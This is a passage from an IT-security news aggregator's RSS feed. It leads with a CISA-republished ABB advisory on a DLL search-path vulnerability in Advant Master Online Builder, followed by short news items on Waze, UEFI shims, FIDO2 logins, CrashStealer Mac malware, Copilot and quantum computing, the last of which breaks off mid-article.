<link>https://tsecurity.de/de/3668599/it-security-nachrichten/abb-advant-master-online-builder/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668599/it-security-nachrichten/abb-advant-master-online-builder/</guid>
<pubDate>Tue, 14 Jul 2026 18:14:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-195-01_drupal.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>ABB became aware of vulnerability in the products versions listed as affected in the advisory, where an incorrect version of Online Builder (ONB) was included in the media. An update is available that resolves the vulnerability, see details in Recommended immediate actions.</strong></p>
<p>The following versions of ABB Advant Master Online Builder are affected:</p>
<ul>
<li>Control Builder A &lt;=1.4/4 (CVE-2025-13162)</li>
<li>800xA for Advant Master &lt;=6.0.3-1, &lt;=6.1.1-1, 6.1.1-3, 6.2.0-1 (CVE-2025-13162, CVE-2025-13162, CVE-2025-13162, CVE-2025-13162)</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 4.4</td>
<td>ABB</td>
<td>ABB Advant Master Online Builder</td>
<td>Uncontrolled Search Path Element</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Critical Manufacturing</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Switzerland</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-13162</a></h3>
<div class="csaf-accordion-content">
<p>The application improperly handles the search path for loading DLL´s, potentially allowing unauthorized libraries from untrusted directories. An attacker who obtains the necessary access could exploit the vulnerability leading to unauthorized code execution and compromising system integrity.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-13162">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>ABB Advant Master Online Builder</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>ABB</div>
<div class="ics-version"><strong>Product Version:</strong><br>ABB Control Builder A &lt;=1.4/4, ABB 800xA for Advant Master &lt;=6.0.3-1, ABB 800xA for Advant Master &lt;=6.1.1-1, ABB 800xA for Advant Master 6.1.1-3, ABB 800xA for Advant Master 6.2.0-1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>ABB has investigated the vulnerability and remediated it in the newly released versions. The vulnerability has been resolved in the product versions listed as fixed in the advisory. - Version 6.1.1-2 does not contain this vulnerability and therefore no update is required. The vulnerability was again introduced in 6.1.1-3 when an older ONB version was included in the release media. - Version 6.1.1-4 do not contain this vulnerability but present version 6.1.1-3 by 800xA System Installer and System Configuration Console (SCC). Version 6.1.1-4 is therefore withdrawn. - Version 6.2.0-2 do not contain this vulnerability but present version 6.2.0-1 by 800xA System Installer and System Configuration Console (SCC). Version 6.2.0-2 is therefore withdrawn. ABB recommends that customers apply the update at their earliest convenience. - Control Builder A: It is recommended to update Control Builder A to version 1.4/5 or later. - 800xA for Advant Master: - Versions 6.0.3-1 and earlier, - Versions 6.1.1-1 and earlier, - Versions 6.1.1-2, 6.1.1-3, and 6.1.1-4 should be updated to version 6.1.1-5 or later. - 800xA for Advant Master: - Versions 6.2.0-1 and 6.2.0-2 should be updated to version 6.2.0-3 or later.</p>
<p><strong>Mitigation</strong><br>Since it is required that the attacker has access to the system, it is important that all users that have access to the system are managed as recommended by ABB guidelines. - Allow only authorized users to log on to the system and enforce strong passwords that are changed regularly. - Restrict temporary connection of portable computers, USB memory devices and other removable data carriers. Computers that can be physically accessed by regular users should have ports for removable data carriers disabled or at least managed to only allow intended device types. For more information on recommended practices, see [1].</p>
<p><strong>Workaround</strong><br>The recommendation is to upgrade to a version where the vulnerability is corrected. If an upgrade Is not possible and a workaround is needed, contact ABB Support.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/427.html">CWE-427 Uncontrolled Search Path Element</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N">CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>ABB PSIRT reported this vulnerability to CISA.</li>
</ul>
<hr>
<h2>Notice</h2>
<p>The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.</p>
<hr>
<h2>Frequently Asked Questions</h2>
<p>What is the scope of vulnerability? - An attacker who successfully exploited this vulnerability could insert and run arbitrary code in an affected system node. What causes the vulnerability? - The vulnerability is caused by not having restricted permission on an application directory where DLL files are stored. What is Advant Master Online Builder? - Online Builder is part of Control Builder A, being a set of applications for configuration and programming of Advant Master controllers. Online Builder is also part of 800xA for Advant Master, an extension package to System 800xA connecting to Advant Master controllers. What might an attacker use the vulnerability to do? - An attacker who successfully exploited this vulnerability can run arbitrary code in an affected node. How could an attacker exploit the vulnerability? - An attacker who obtains the necessary access could exploit vulnerability by placing malicious DLL´s in the unrestricted application directory, leading to unauthorized code execution and compromising system integrity. Could the vulnerability be exploited remotely? - No, to exploit this vulnerability an attacker would need to have physical access to an affected system node. Can functional safety be affected by an exploit of this vulnerability? - No. What does the update do? - The update of the Online Builder (ONB) resolves the vulnerability by adding restrictions to the application folder, requiring authentication. When this security advisory was issued, had this vulnerability been publicly disclosed? - No, ABB identified this vulnerability through its internal security assessment and verification processes. When this security advisory was issued, had ABB received any reports that this vulnerability was being exploited? - No, ABB had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued.</p>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities.</p>
<p>Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolate them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<hr>
<h2>Advisory Conversion Disclaimer</h2>
<p>This ICSA is a verbatim republication of ABB PSIRT 7PAA020047 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory.</p>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-23</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-23</td>
<td>1</td>
<td>Initial version.</td>
</tr>
<tr>
<td>2026-07-14</td>
<td>2</td>
<td>Initial CISA Republication of ABB PSIRT 7PAA020047 advisory</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Waze gets smarter routes and a quieter voice mode]]></title>
<description><![CDATA[Google is updating its popular navigation app with a set of new tools powered by its Gemini AI. The latest Waze update focuses on learning how you actually like to drive instead of just finding the mathematically fastest route. From a dedicated motorcycle setting to a quieter voice assistant, the...]]></description>
<link>https://tsecurity.de/de/3667980/ios-mac-os/waze-gets-smarter-routes-and-a-quieter-voice-mode/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667980/ios-mac-os/waze-gets-smarter-routes-and-a-quieter-voice-mode/</guid>
<pubDate>Tue, 14 Jul 2026 14:53:19 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google is updating its popular navigation app with a set of new tools powered by its Gemini AI. The latest Waze update focuses on learning how you actually like to drive instead of just finding the mathematically fastest route. From a dedicated motorcycle setting to a quieter voice assistant, these changes aim to make your daily commute feel a bit more personal and a lot less distracting.



The app suggests routes based on your past habits



Waze is moving away from a single standard approach to driving directions. The app will now look at your driving history to suggest routes tailored to your preferences. If you usually pick highways over local streets with lots of stoplights, the app will start putting those highway options at the top of your list.



This feature works alongside the app's existing traffic data to find a path you will actually enjoy taking. You can still pick alternative routes if you want a change of scenery. If you do not want the app to use your history, you can easily turn off personalized navigation in the settings menu. This change is currently rolling out for everyone on Android and iOS.



A new voice mode cuts down on frequent interruptions



Listening to a good podcast or your favorite music is tough when your GPS keeps talking over the best parts. Waze is adding a less chatty mode to fix this exact problem. When you turn this setting on, the app drastically reduces the number of spoken prompts it gives you during a drive.



The instructions it does say out loud are kept short and straight to the point. You will still hear critical alerts for things like upcoming turns, lane changes, and road hazards. It just filters out the unnecessary chatter so you can focus on the road and enjoy your audio in peace.



Artificial intelligence handles voice reporting and two-wheel navigation



Reporting a road closure or hazard is getting much easier. You can now use the conversational reporting feature to suggest map updates using your voice. You just speak naturally to the app to flag things like closed roads or wrong addresses, and local map editors will verify the details before updating the live map.



Google is also rolling out a dedicated motorcycle mode in a few select countries like Mexico, Brazil, and the Philippines. This mode uses AI to find routes and shortcuts specifically suited for two-wheeled vehicles. It also highlights hazards that matter most to riders, such as potholes, speed bumps, and narrow bridges.



The addition of Gemini voice search is also being tested in beta, allowing users to ask for cheap gas stations or open coffee shops nearby. These updates show the navigation platform is focusing heavily on context and individual needs, turning a simple map tool into a smarter driving partner.]]></content:encoded>
</item>
<item>
<title><![CDATA[No one knows how many old shims can still bypass UEFI Secure Boot]]></title>
<description><![CDATA[The vast majority of UEFI computers carry a Microsoft certificate that will trust a small first-stage loader called a shim, a program Microsoft signs so that Linux and assorted boot tools can run with Secure Boot on. Eleven of those…
Read more →
The post No one knows how many old shims can still ...]]></description>
<link>https://tsecurity.de/de/3667708/it-security-nachrichten/no-one-knows-how-many-old-shims-can-still-bypass-uefi-secure-boot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667708/it-security-nachrichten/no-one-knows-how-many-old-shims-can-still-bypass-uefi-secure-boot/</guid>
<pubDate>Tue, 14 Jul 2026 13:08:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The vast majority of UEFI computers carry a Microsoft certificate that will trust a small first-stage loader called a shim, a program Microsoft signs so that Linux and assorted boot tools can run with Secure Boot on. Eleven of those…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/no-one-knows-how-many-old-shims-can-still-bypass-uefi-secure-boot/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/no-one-knows-how-many-old-shims-can-still-bypass-uefi-secure-boot/">No one knows how many old shims can still bypass UEFI Secure Boot</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google adds FIDO2 keys and phone passkeys to Windows login via GCPW]]></title>
<description><![CDATA[Google has started rolling out FIDO2-compliant physical security key support as a second factor for authentication in Google Credential Provider for Windows (GCPW) to all Google Workspace customers. GCPW is a free tool that lets users sign in to Windows computers with their Google Workspace accou...]]></description>
<link>https://tsecurity.de/de/3667678/it-security-nachrichten/google-adds-fido2-keys-and-phone-passkeys-to-windows-login-via-gcpw/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667678/it-security-nachrichten/google-adds-fido2-keys-and-phone-passkeys-to-windows-login-via-gcpw/</guid>
<pubDate>Tue, 14 Jul 2026 12:54:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google has started rolling out FIDO2-compliant physical security key support as a second factor for authentication in Google Credential Provider for Windows (GCPW) to all Google Workspace customers. GCPW is a free tool that lets users sign in to Windows computers with their Google Workspace account instead of, or alongside, a Windows username and password. The update allows organizations to strengthen account security by enabling administrators to enforce 2-step verification (2SV) with hardware security keys … <a href="https://www.helpnetsecurity.com/2026/07/14/security-key-windows-login-google-workspace/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/14/security-key-windows-login-google-workspace/">Google adds FIDO2 keys and phone passkeys to Windows login via GCPW</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[No one knows how many old shims can still bypass UEFI Secure Boot]]></title>
<description><![CDATA[The vast majority of UEFI computers carry a Microsoft certificate that will trust a small first-stage loader called a shim, a program Microsoft signs so that Linux and assorted boot tools can run with Secure Boot on. Eleven of those signed shims turned out to be old enough to undo the protection ...]]></description>
<link>https://tsecurity.de/de/3667643/it-security-nachrichten/no-one-knows-how-many-old-shims-can-still-bypass-uefi-secure-boot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667643/it-security-nachrichten/no-one-knows-how-many-old-shims-can-still-bypass-uefi-secure-boot/</guid>
<pubDate>Tue, 14 Jul 2026 12:38:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The vast majority of UEFI computers carry a Microsoft certificate that will trust a small first-stage loader called a shim, a program Microsoft signs so that Linux and assorted boot tools can run with Secure Boot on. Eleven of those signed shims turned out to be old enough to undo the protection they were meant to support. ESET researchers found the vulnerable versions, all at 0.9 or below, and Microsoft revoked them in its June … <a href="https://www.helpnetsecurity.com/2026/07/14/eset-uefi-secure-boot-bypass/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/14/eset-uefi-secure-boot-bypass/">No one knows how many old shims can still bypass UEFI Secure Boot</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alan Turing's biggest AI assumption may have been wrong]]></title>
<description><![CDATA[A new book claims AI has been built on a flawed assumption dating back to Alan Turing's famous 1950 paper. Peter J. Denning argues that the most important parts of human intelligence, including common sense, intuition, culture, and practical know-how, cannot be encoded into computers. He believes...]]></description>
<link>https://tsecurity.de/de/3667134/ai-nachrichten/alan-turings-biggest-ai-assumption-may-have-been-wrong/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667134/ai-nachrichten/alan-turings-biggest-ai-assumption-may-have-been-wrong/</guid>
<pubDate>Tue, 14 Jul 2026 09:18:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new book claims AI has been built on a flawed assumption dating back to Alan Turing's famous 1950 paper. Peter J. Denning argues that the most important parts of human intelligence, including common sense, intuition, culture, and practical know-how, cannot be encoded into computers. He believes this makes true human-level AI impossible, regardless of how large language models become.]]></content:encoded>
</item>
<item>
<title><![CDATA[Copilot kann jetzt feststellen, was Ihren Computer verlangsamt]]></title>
<description><![CDATA[Microsoft hat damit begonnen, eine neue „PC Insights“-Funktion in Copilot für Windows 11 zu testen, die Nutzern dabei hilft, die Leistung ihres Computers zu analysieren und Fragen zum Systemstatus zu beantworten, berichtet Windows Latest.



Mit Zustimmung des Nutzers kann Copilot die Prozessor- ...]]></description>
<link>https://tsecurity.de/de/3667094/it-nachrichten/copilot-kann-jetzt-feststellen-was-ihren-computer-verlangsamt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667094/it-nachrichten/copilot-kann-jetzt-feststellen-was-ihren-computer-verlangsamt/</guid>
<pubDate>Tue, 14 Jul 2026 09:03:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft hat damit begonnen, eine neue „PC Insights“-Funktion in Copilot für Windows 11 zu testen, die Nutzern dabei hilft, die Leistung ihres Computers zu analysieren und Fragen zum Systemstatus zu beantworten, berichtet <a href="https://www.windowslatest.com/2026/07/12/windows-11-copilot-ai-can-now-tell-you-whats-slowing-down-your-pc-while-using-1gb-of-ram-itself/">Windows Latest</a>.</p>



<p>Mit Zustimmung des Nutzers kann Copilot die Prozessor- und Speicherauslastung, den freien Speicherplatz, angeschlossene USB-Geräte, den Netzwerkstatus, den Akkustand, die BIOS-Version und die Grafikkarte analysieren.</p>



<h2 class="wp-block-heading">Nur analysieren, nicht aber reparieren</h2>



<p>Die Idee ist, dass der Nutzer Fragen zur Hardware stellen kann, woraufhin Copilot auf der Grundlage des aktuellen Systemstatus antwortet. PC Insights kann jedoch lediglich Informationen auslesen und analysieren, Probleme jedoch nicht automatisch beheben. Das könnte sich laut Windowslatest jedoch noch ändern.</p>



<p>Microsoft gibt an, dass die Nutzung dieser Funktion freiwillig ist und dass persönliche Dateien sowie Systemdaten nicht zum Trainieren von KI-Modellen verwendet werden. Microsoft <a href="https://support.microsoft.com/en-us/microsoft-copilot/pc-insights#wl">schreibt</a> in einem Support-Dokument: “Copilot greift erst dann auf Informationen zu, wenn Sie Ihre Zustimmung erteilt haben. Wenn Sie eine Frage stellen, fragt Copilot Sie zunächst, bevor es auf relevante Informationen auf Ihrem PC zugreift”. Sie können Copilot aber so umstellen, dass Sie ihm den ständigen Zugriff auf die Hardware-Daten erlauben. Dann muss Copilot nicht immer nachfragen.</p>



<p>Derzeit steht die neue Funktion nur Testnutzern in den USA zur Verfügung; Sie können „PC Insights“ also nur mit Insider-Testversionen verwenden und auch das nur auf bestimmten Rechnern in den USA. Deutsche Insider-Tester bleiben derzeit also außen vor. Wann „PC Insights“ für alle Windowsnutzer verfügbar sein wird, ist derzeit noch nicht bekannt.</p>



<p>Windowslatest betont allerdings, dass es sich bei dieser neuen Copilot-Funktion um eine Webapp handelt, die ein Gigabyte Arbeitsspeicher belegt – und das sogar dann, wenn sie überhaupt nichts macht.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CrashStealer Malware Targets Mac Users Through Fake App Prompts]]></title>
<description><![CDATA[Security researchers have uncovered a new threat targeting Mac computers. A malicious program called "CrashStealer" is currently circulating online, and it is designed to look like a legitimate system tool to trick users into handing over their passwords. The malware is focused on stealing browse...]]></description>
<link>https://tsecurity.de/de/3666747/ios-mac-os/crashstealer-malware-targets-mac-users-through-fake-app-prompts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666747/ios-mac-os/crashstealer-malware-targets-mac-users-through-fake-app-prompts/</guid>
<pubDate>Tue, 14 Jul 2026 04:55:06 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security researchers have uncovered a new threat targeting Mac computers. A malicious program called "CrashStealer" is currently circulating online, and it is designed to look like a legitimate system tool to trick users into handing over their passwords. The malware is focused on stealing browser data, crypto wallet credentials, and passwords saved directly on your computer.



What makes this attack especially dangerous is that the initial download actually passed security checks from Apple and received official notarization. Apple has since revoked the developer credentials, but the campaign highlights how attackers are getting better at sneaking past standard security gates.



Attackers use a fake meeting app to deliver the payload



The attack typically starts with a fake collaboration or meeting app called "Werkbit." Scammers place this download behind a specific meeting PIN, meaning they are likely targeting specific victims directly rather than blasting the link across the public internet.



Once a user downloads and opens the Werkbit app, it quietly reaches out to a remote server and downloads the actual CrashStealer malware in the background. The malware then disguises itself as "CrashReporter," a name chosen to mimic an official macOS crash reporting tool that most users would ignore.



The malware uses fake password prompts to unlock your data



Once installed on your system, CrashStealer generates a pop-up window that looks exactly like a standard Mac authorization prompt. It asks you to enter your system password to grant access for "system administration."



If you enter your password, the malware validates it immediately. It then uses your confirmed password to unlock your Mac login keychain. CrashStealer rapidly copies your saved passwords from browsers, password managers, and crypto extensions. It bundles all this data into an encrypted ZIP file and sends it back to the attackers. The malware also sets itself to run automatically every time you log in, so the threat stays active even if you restart your computer.



If you suspect you have downloaded a suspicious meeting app or entered your password into an unexpected prompt, security experts recommend disconnecting from the internet, changing all major passwords from a safe device, and completely erasing your Mac to perform a clean install.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Convert Minecraft Bedrock Seeds to Java Edition]]></title>
<description><![CDATA[Minecraft is available on all popular platforms/devices, from desktop computers to mobile phones. Some platforms even have more than one edition of the game. Two of the most widely played are Minecraft Bedrock Edition and Minecraft Java Edition — and knowing how to use bedrock seeds to java world...]]></description>
<link>https://tsecurity.de/de/3666687/betriebssysteme/how-to-convert-minecraft-bedrock-seeds-to-java-edition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666687/betriebssysteme/how-to-convert-minecraft-bedrock-seeds-to-java-edition/</guid>
<pubDate>Tue, 14 Jul 2026 03:39:13 +0200</pubDate>
<category>🖥️  Betriebssysteme</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Minecraft is available on all popular platforms/devices, from desktop computers to mobile phones. Some platforms even have more than one edition of the game. Two of the most widely played are Minecraft Bedrock Edition and Minecraft Java Edition — and knowing how to use bedrock seeds to java worlds, and vice versa, matters a great […]</p>
<p>The post <a rel="nofollow" href="https://www.addictivetips.com/gaming/minecraft-bedrock-seeds-to-java/">How to Convert Minecraft Bedrock Seeds to Java Edition</a> appeared first on <a rel="nofollow" href="https://www.addictivetips.com/">AddictiveTips</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IBM Quantum System One London: Why Every Organisation Should Be Preparing for Post-Quantum Cryptography (PQC)]]></title>
<description><![CDATA[Walking past IBM's offices on York Road, just a short walk from
  Waterloo Station, I spotted the
  IBM Quantum System One on public display. Like many people,
  I initially wondered whether it was simply a replica or a marketing exhibit.


The answer is no.


  This is a genuine IBM Quantum Syst...]]></description>
<link>https://tsecurity.de/de/3666536/it-security-nachrichten/ibm-quantum-system-one-london-why-every-organisation-should-be-preparing-for-post-quantum-cryptography-pqc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666536/it-security-nachrichten/ibm-quantum-system-one-london-why-every-organisation-should-be-preparing-for-post-quantum-cryptography-pqc/</guid>
<pubDate>Tue, 14 Jul 2026 00:22:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>
  Walking past IBM's offices on York Road, just a short walk from
  <strong>Waterloo Station</strong>, I spotted the
  <strong>IBM Quantum System One</strong> on public display. Like many people,
  I initially wondered whether it was simply a replica or a marketing exhibit.
</span></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGRBegdY3fpU0LCDA5yVg3odZBxwCoUlD1os4OZm5b6qOafR13c3KUZoK2Hvj1e13_o188IIQ48fVV7zRDhDy7wOh6KiqpnveJKqkGN31JLvNAvwLd6olmQPrbeqxt8Rzqkk_0wCK7nT2aE9_ppXR35ZuNmRuDuftg2RnqHZiXBDxst34FgwpSMVO3nikK/s2760/IMG_2059.jpeg"><span><img border="0" data-original-height="2760" data-original-width="2286" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGRBegdY3fpU0LCDA5yVg3odZBxwCoUlD1os4OZm5b6qOafR13c3KUZoK2Hvj1e13_o188IIQ48fVV7zRDhDy7wOh6KiqpnveJKqkGN31JLvNAvwLd6olmQPrbeqxt8Rzqkk_0wCK7nT2aE9_ppXR35ZuNmRuDuftg2RnqHZiXBDxst34FgwpSMVO3nikK/s320/IMG_2059.jpeg" width="265"></span></a></div>

<p><strong><span>The answer is no.</span></strong></p>

<p><span>
  This is a genuine <strong>IBM Quantum System One</strong>, housed within a
  sophisticated dilution refrigerator designed to keep its superconducting
  quantum processor at temperatures only a fraction of a degree above absolute
  zero.
</span></p>

<p><span>
  The striking gold structure that catches everyone's attention is not the
  quantum processor itself. The processor is tiny compared with the surrounding
  equipment and sits deep inside the system. Much of what you can see exists to
  cool, control and protect the processor from heat, vibration and electrical
  interference.
</span></p>

<p><span>
  It is a fascinating sight and well worth stopping to admire when passing
  through Waterloo.
</span></p><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuzBui9SJ7uuF09GV3NypX6x1zF0ee9rhp0qxB4I365QzzOq3SvKsLlw9kjtBhyphenhyphenhyWUSrx8SXV1MC2L7wosq8jrk1dN54d7FcusKgTNUy3nU3scdnvUhvtQZQwLFf5xIneCygghAs_OV2mFQKsgydHAarmLFOf_TqLttuTGkEiuZYD9lxOd2bf8YkOpa88/s5712/IMG_2072.jpeg"><img border="0" data-original-height="5712" data-original-width="4284" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuzBui9SJ7uuF09GV3NypX6x1zF0ee9rhp0qxB4I365QzzOq3SvKsLlw9kjtBhyphenhyphenhyWUSrx8SXV1MC2L7wosq8jrk1dN54d7FcusKgTNUy3nU3scdnvUhvtQZQwLFf5xIneCygghAs_OV2mFQKsgydHAarmLFOf_TqLttuTGkEiuZYD9lxOd2bf8YkOpa88/w480-h640/IMG_2072.jpeg" width="480"></a></div><p></p>

<h2><span>More Than a Display</span></h2>

<p><span>
  What many people do not realise is that IBM's quantum technology is not
  simply something to observe through glass.
</span></p>

<p><span>
  Through the
  <a href="https://quantum.ibm.com/" rel="noopener noreferrer" target="_blank">
    <strong>IBM Quantum Platform</strong></a>, researchers, developers, students and organisations can access IBM quantum
  computers remotely through the cloud.</span></p>

<p><span>
  IBM currently offers access to quantum processing units, or
  <strong>QPUs</strong>, alongside documentation, tutorials, learning resources
  and software tools. Its platform also provides a limited amount of free
  execution time, allowing users to experiment with real quantum hardware
  rather than relying only on simulators.
</span></p>

<p><span>
  Developers can create and execute quantum circuits using
  <a href="https://www.ibm.com/quantum/qiskit" target="_blank"><strong>Qiskit</strong>,</a> IBM's open-source software development kit for
  quantum computing.
</span></p>

<p><span>For developers, the basic installation begins with:</span></p>

<pre><code><span>pip install qiskit
pip install qiskit-ibm-runtime</span></code></pre>

<p><span>
  The IBM Quantum Platform includes resources covering quantum information
  science, optimisation, Hamiltonian simulation and machine learning. It also
  offers tools such as Composer, which allows users to construct and run
  quantum circuits visually.
</span></p>

<p><span>
  Quantum computing is no longer confined entirely to specialist laboratories.
  Developers and researchers can already gain practical experience with real
  quantum hardware.
</span></p>

<h2><span>Why Does a Quantum Computer Need to Be So Cold?</span></h2>

<p><span>
  IBM's systems use <strong>superconducting qubits</strong>, which are extremely
  sensitive to their surroundings.
</span></p>

<p><span>
  At ordinary temperatures, heat and electrical noise would disrupt the fragile
  quantum states needed for computation. The dilution refrigerator therefore
  cools the processor through several stages until it reaches temperatures
  close to absolute zero.
</span></p>

<p><span>
  This extremely controlled environment allows the qubits to retain their
  quantum properties long enough for calculations to be performed.
</span></p>

<p><span>It is an extraordinary feat of engineering.</span></p>

<h2><span>Will Quantum Computers Break Today's Encryption?</span></h2>

<p><span>This is the question cybersecurity professionals hear most often.</span></p>

<p><strong><span>Not today.</span></strong></p>

<p><span>
  Current quantum computers do not have the scale, reliability or fault
  tolerance required to break the public key cryptography used across banking,
  virtual private networks, digital certificates, software signing and secure
  communications.
</span></p>

<p><span>
